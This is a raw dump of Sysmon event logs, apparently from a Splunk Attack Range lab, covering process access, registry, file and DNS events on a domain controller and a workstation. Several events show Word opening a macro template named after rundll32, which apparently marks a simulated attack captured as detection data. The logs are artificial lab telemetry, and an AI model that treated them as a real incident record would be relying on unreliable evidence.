19:19:10.655{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095409Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.655{761B69BB-818A-607D-0500-00000000BA01}408532C:\Windows\system32\csrss.exe{761B69BB-7AAE-6080-9D5F-00000000BA01}6436C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095408Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.655{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AAE-6080-9D5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095407Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.654{761B69BB-7AAE-6080-9D5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001095406Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095405Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095404Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.131{761B69BB-820D-607D-D800-00000000BA01}1064NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48183CF83E605A25328217037FDE4E36,SHA256=27F24463234567260A3E2DF69DEB10A45B8D5E49D51829F20E40B1D6360837A4,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001606843Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.756{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0Binary Data 13241300x80000000000000001606842Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.756{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Word\Data\SettingsBinary Data 23542300x80000000000000001606841Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.693{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{4ECC9FC5-CBED-4182-9AE9-8FE8A27EDD92}.tmpMD5=5D4D94EE7E06BBB0AF9584119797B23A,SHA256=4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1falsefalse - insufficient disk space 23542300x80000000000000001606840Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.693{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\Desktop\~$_doc1_rundll32.dotmMD5=9D38DD14FE73C4644ACC4B09B76CBCC1,SHA256=9E9839055DCC6C3ED506956752AAC8644F0C3ED5F2AB6C3CC097779C5162DFDDfalsefalse - insufficient 
disk space 13241300x80000000000000001606839Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.671{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Common\Toolbars\Settings\Microsoft WordBinary Data 13241300x80000000000000001606838Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.593{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606837Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.593{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.RkcybereBinary Data 13241300x80000000000000001606836Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.593{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001606835Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:10.593{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 10341000x80000000000000001606834Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.593{21761711-84C9-607D-F200-00000000BB01}37845700C:\Windows\Explorer.EXE{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft 
Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606833Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.590{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606832Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.590{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606831Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.339{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606830Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.339{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A7072D613135A98E1933758599669BB,SHA256=5DEE7351E8D26A7BD32B3B78AA60A9D5AD0A8DEFB5063F3D3C2B5A78836EA7B6falsefalse - insufficient disk space 10341000x80000000000000001095403Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.125{761B69BB-7AAD-6080-9C5F-00000000BA01}33164668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606884Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.912{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 11241100x80000000000000001606883Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.912{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606882Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.912{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E7B9A8EA4057A6FAA80F9FA16F17716B,SHA256=BA7D40D201B45F3ABF36421E2296402DFBA7680A4E97E72E5E4E3565F4354605falsefalse - insufficient disk space 23542300x80000000000000001606881Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.912{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28AA620D0729A95FF1047552327A8538,SHA256=C467E035B930A2BFC9DC1AF143EEA3DB34F866FFCF4DC2A3A42E2DE4B1F11022falsefalse - insufficient disk space 354300x80000000000000001095428Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.474{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-982.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal64935- 10341000x80000000000000001095427Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:11.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095426Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095425Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.458{761B69BB-7AAF-6080-9E5F-00000000BA01}34485448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095424Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.324{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AAF-6080-9E5F-00000000BA01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095423Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.322{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095422Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:11.322{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095421Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.321{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095420Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:11.321{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095419Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.321{761B69BB-818A-607D-0500-00000000BA01}408532C:\Windows\system32\csrss.exe{761B69BB-7AAF-6080-9E5F-00000000BA01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095418Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.321{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AAF-6080-9E5F-00000000BA01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095417Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.320{761B69BB-7AAF-6080-9E5F-00000000BA01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095416Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.142{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF457A92F38376249953E88969735D24,SHA256=7923D919D813D3F570B9194D0EFAFA77936C8C4A1AC5542BD7FBD16EC037CF77,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001606880Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:11.310{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE 734700x80000000000000001606879Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.310{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 23542300x80000000000000001606878Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.310{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{C690E55C-3200-4E0D-8E4A-2DA4B6496C42}.tmpMD5=1AC426391380A9A53F1ACE4066AF30F3,SHA256=CA1867E710CDB95EFB0CDFDBC7A43142C0615343B8A67CD77BA0CBA64116F3A9falsefalse - insufficient disk space 12241200x80000000000000001606877Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-DeleteKey2021-04-21 